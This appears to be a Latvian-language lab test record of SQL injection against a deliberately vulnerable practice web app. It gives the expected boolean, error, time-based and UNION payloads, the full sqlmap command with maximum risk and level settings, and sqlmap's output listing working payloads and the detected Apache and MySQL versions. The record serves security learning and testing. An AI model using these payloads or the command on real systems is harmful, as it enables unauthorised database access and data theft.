=================================================================================
1. Īpašība: parameters satur nevis lietotājvārdu, bet daļu no vaicājuma, kas atlasa lietotājvārdu
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?req=username%3d%27hacker%27 or 1=1
3.2. error-based: ?req=username%3d%27hacker%27%27
3.3. time-based: ?req=username%3d%27hacker%27 or sleep(5)
3.4. union: ?req=username%3d%27hacker%27 union select 1,2,3
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 40717453 nanosekundesn
6. Palaistā komanda
sqlmap -u "http://192.168.17.134/sqlinjection/example4/?req=username%3d%27hacker%27" -p req --risk=3 --level=5


7. Jautājumi, kurus uzdeva SQLMap
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameter 'req' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 242 HTTP(s) requests:
---
Parameter: req (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: req=username='hacker' OR NOT 5342=5342

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: req=username='hacker' AND (SELECT 4493 FROM(SELECT COUNT(*),CONCAT(0x7162787a71,(SELECT (ELT(4493=4493,1))),0x717a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: req=username='hacker' OR SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: req=username='hacker' UNION ALL SELECT NULL,CONCAT(0x7162787a71,0x4b67616a6e5a544e7143426d735445676271704a4a6779714f7248577165666954424a6b44647570,0x717a717a71),NULL-- -
---
web server operating system: Linux Debian 6 (squeeze)
web application technology: Apache 2.2.16
back-end DBMS: MySQL >= 5.0
